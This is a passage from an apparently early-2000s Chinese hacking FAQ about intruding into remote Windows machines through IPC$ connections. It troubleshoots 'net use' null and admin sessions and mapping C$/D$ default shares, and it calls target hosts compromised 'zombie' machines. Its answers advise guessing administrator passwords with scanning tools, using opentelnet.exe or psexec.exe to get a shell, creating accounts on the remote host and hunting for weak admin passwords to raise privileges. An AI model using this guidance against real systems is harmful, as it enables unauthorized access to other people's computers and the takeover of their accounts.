,且能建立空聯(lián)接,但打開 C 、 D 盤時,都要求密碼,我知道是空連接沒有太多的權(quán)限,但沒別的辦法了嗎? 答:建議先用流光或者別的什么掃描軟件試著猜解一下密碼,如果猜不出來,只能放棄,畢竟空連接的能力有限。 4. 我已經(jīng)猜解到了管理員的密碼,且已經(jīng) ipc$ 連接成功了,但 net view ip 發(fā)現(xiàn)它沒開默認(rèn)共享,我該怎么辦? 答:首先糾正你的一個錯誤,用 net view ip 是無法看到默認(rèn)共享的,你可以試著將文件復(fù)制到 c$ , d$ 看看,如果都不行,說明他關(guān)閉了默認(rèn)共享,那你就用 opentelnet.exe 或 psexec.exe 吧,用法上面有。 5.ipc$ 連接成功后,我用下面的命令建立了一個帳戶,卻發(fā)現(xiàn)這個帳戶在我自己的機(jī)器上,這是怎么回事? net uset ccbirds /add 答: ipc$ 建立成功只能說明你與遠(yuǎn)程主機(jī)建立了通信隧道,并不意味你取得了一個 shell ,只有在獲得一個 shell (比如 telnet )之后,你才能在遠(yuǎn)程機(jī)器建立一個帳戶,否則你的操作只是在本地進(jìn)行。 6. 我已進(jìn)入了一臺肉機(jī),用的管理員帳號,可以看他的系統(tǒng)時間,但是復(fù)制程序到他的機(jī)子上卻不行,每次都提示“拒絕訪問,已復(fù)制 0 個文件”,是不是對方有什么服務(wù)沒開,我該怎么辦? 答:一般來說“拒絕訪問”都是權(quán)限不夠的結(jié)果,可能是你用的帳戶有問題,還有一種可能,如果你想向普通共享文件夾復(fù)制文件卻返回這個錯誤,說明這個文件夾設(shè)置的允許訪問用戶中不包括你(哪怕你是管理員),這一點(diǎn)我在上一期文章中分析了。 7. 我用 Win98 能與對方建立 ipc$ 連接嗎? 答:理論上不可以,要進(jìn)行 ipc$ 的操作,建議用 win2000 ,用其他操作系統(tǒng)會帶來許多不必要的麻煩。 8. 我用 net use ipipc$ "" /user "" 成功的建立了一個空會話,但用 nbtstat -A IP 卻無法導(dǎo)出用戶列表,這是為什么? 答:空會話在默認(rèn)的情況下是可以導(dǎo)出用戶列表的,但如果管理員通過修改注冊表來禁止導(dǎo)出列表,就會出現(xiàn)你所說的情況;還有可能是你自己的 NBT 沒有打開, netstat 命令是建立在 NBT 之上的。 9. 我建立 ipc$ 連接的時候返回如下信息:‘提供的憑據(jù)與已存在的憑據(jù)集沖突,怎么回事? 答:呵呵,這說明你已經(jīng)與目標(biāo)主機(jī)建立了 ipc$ 連接,兩個主機(jī)間同時建立兩個 ipc$ 連接是不允許的。 10. 我在映射的時候出現(xiàn): F:>net use h: 211.161.134.*e$ 系統(tǒng)發(fā)生 85 錯誤。 本地設(shè)備名已在使用中。這是怎么回事? 答:你也太粗心了吧,這說明你有一個 h 盤了,映射到?jīng)]有的盤符吧! 11. 我建立了一個連接 f:>net use *.*.*.*ipc$ "123" /user:"guest" 成功了,但當(dāng)我映射時出現(xiàn)了錯誤,向我要密碼,怎么回事? F:>net use h: *.*.*.*c$ 密碼在 *.*.*.*c$ 無效。 請鍵入 *.*.*.*c$ 的密碼 : 系統(tǒng)發(fā)生 5 錯誤。 拒絕訪問。 答:呵呵,向你要密碼說明你當(dāng)前使用的用戶權(quán)限不夠,不能映射 C$ 這個默認(rèn)共享,想辦法提升權(quán)限或者找管理員的弱口令吧!默認(rèn)共享一般是需要管理員權(quán)限的。 12. 我用 superscan 掃到了一個開了 139 端口的主機(jī),但為什么不能空連接呢? 答:你混淆了 ipc$ 與 139 的關(guān)系,能進(jìn)行 ipc$ 連接的主機(jī)一定開了 139 或 445 端口,但開這兩個端口的主機(jī)可不一定能空連接,因?yàn)閷Ψ娇梢躁P(guān)閉 ipc$ 共享 . 13. 我們局域網(wǎng)里的機(jī)器大多都是 xp ,我用流光掃描到幾個 administrator 帳號口令是空,而且可以連接,但不能復(fù)制東西,說錯誤 5 。請問為什么? 答: xp 的安全性要高一些,在安全策略的默認(rèn)設(shè)置中,對本地帳戶的網(wǎng)絡(luò)登錄進(jìn)行身份驗(yàn)證的時候,默認(rèn)為來賓權(quán)限,即使你用管理員遠(yuǎn)程登錄,也只具有來賓權(quán)限,因此你復(fù)制文件,當(dāng)然是錯誤 5 :權(quán)限不夠。 14. 我用 net use 192.168.0.2ipc$ "password" /user:"administrator" 成功,可是 net use i: 192.168.0.2c 出現(xiàn)請鍵入 192.168.0.2 的密碼,怎么回事情呢?我用的可是管理員呀?應(yīng)該什么都可以訪問呀? 答:雖然你具有管理員權(quán)限,但管理員在設(shè)置 c 盤共享權(quán)限時(注意:普通共享可以設(shè)置訪問權(quán)限,而默認(rèn)共享則不能)可能并未設(shè)置允許 administrator 訪問,所以會出現(xiàn)上述問題。 15. 如果自己的機(jī)器禁止了 ipc$, 是不是還可以用 ipc$ 連接別的機(jī)器?如果禁止 server 服務(wù)呢? 答:禁止以上兩項仍可以發(fā)起 ipc$ 連接,不過這種問題自己動手試驗(yàn)會更好。 16. 能告訴我下面的兩個錯誤產(chǎn)生的原因嗎? c:>net time 61.225.*.* 系統(tǒng)發(fā)生 5 錯誤。 拒絕訪問。 c:>net view 61.225.*.* 系統(tǒng)發(fā)生 5 錯誤。 拒絕訪問。 答:起初遇到這個問題的時候我也很納悶,錯誤 5表示權(quán)限不夠,可是連空會話的權(quán)限都可以完成上面的兩個命令,他為什么不行呢?難道是他沒建立連接?后來那個粗心的同志告訴我的確是這樣,他忘記了自己已經(jīng)刪了 ipc$ 連接,之后他又輸入了上面那兩個命令,隨之發(fā)生了錯誤 5 。 17. 您看看這是怎么回事? F:>net time 找不到時間服務(wù)器。 請鍵入 NET HELPMSG 3912 以獲得更多的幫助。 答:答案很簡單,你的命令錯了,應(yīng)該是 net time ip 沒輸入 ip 地址,當(dāng)然找不到服務(wù)器。 view 的命令也應(yīng)該有 ip 地址,即: net view ip
|
|
發(fā)表留言請先登錄!
|